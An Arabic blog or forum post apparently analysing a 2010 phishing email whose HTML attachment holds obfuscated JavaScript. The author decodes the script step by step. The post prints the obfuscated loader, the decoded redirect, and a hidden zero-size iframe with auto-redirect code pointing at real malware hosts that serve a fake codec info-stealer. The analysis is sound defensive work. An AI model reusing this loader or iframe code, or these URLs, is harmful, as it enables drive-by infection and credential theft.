السلام عليكم ورحمة الله وبركاته
اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF
للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها
كود PHP
---------------------------- Message original
----------------------------
Objet: PDF of JS article
De: "Maude Gorman"
Date: Lun 20 november 2010 21:21
--------------------------------------------------------------------------
see attached.
-V
60488Journal Sentinel - Leka Obit.html
الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد
الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة
لأعرف محتواها فوجدت كود جافا سكربت التالي:
كود PHP
<****** language="**********" type="text/**********">function
aavk(u4zc){var
fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6F n
s%30k9%28uy%73e)**%71sv%32+=%75yse%7D"));for(fwag=0 ;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);x sln=tkql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;**s0k9(tkql.ch arAt(xsln));**else{s0k9(cxzm);****eval(unescape("%64o c%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));** aavk(":aa<tsx\"xsh<.ptc0fe>bai
p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif
b.mi;nxrtochp");</******><no******>To display this page you
need a browser that supports **********.</no******>
كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة
بعد فك التشفير حصلت على التالي:
كود PHP
**********
function aavk(u4zc)**
var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;
function s0k9(uyse)**
qsv2+=uyse
**
for(fwag=0;fwag<u4zc.length;fwag++)**
cxzm=u4zc.charAt(fwag);
xsln=tkql.indexOf(cxzm);
if(xsln>-1)**
xsln-=(fwag+1)%xtur;
if(xsln<0)**
xsln+=xtur;
**
s0k9(tkql.charAt(xsln));
**
else{
s0k9(cxzm);
**
**
********.write(qsv2);
qsv2="";
**
aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln
=u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");
</******><no******>To display this page you need a browser
that supports **********.</no******>
يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم
نقوم بتعديل المستند .write عن طريق ***** لنشاهد الكود الذي يتم تحصيله
كود PHP
<**** **********="*******"
*******="0;url=http://barrhavenbia.ca/x.html" />
اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة
الصفحة تحتوي على الكود التالي:
كود PHP
PLEASE WAITING.... 4 SECONDS
<****** width="0" height="0"
src="http://finwizonline.com/news/"></******>
<**** **********="*******"
*******="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" />
قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس)
تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت
الفايروس موجود على المسار التالي /news/exe.exe
قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي:
http://www.virustotal.com/file-scan/report.htm
7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه
نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec)
نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك
قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية:
http://www.virustotal.com/file-scan/report.html
فقط 20 برنامج حماية اكتشف الفايروس
الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه
تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html
بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح
الفايروس يبدو و كانه فايروس زيوس المعروف
الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا
لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم
الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها
برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان…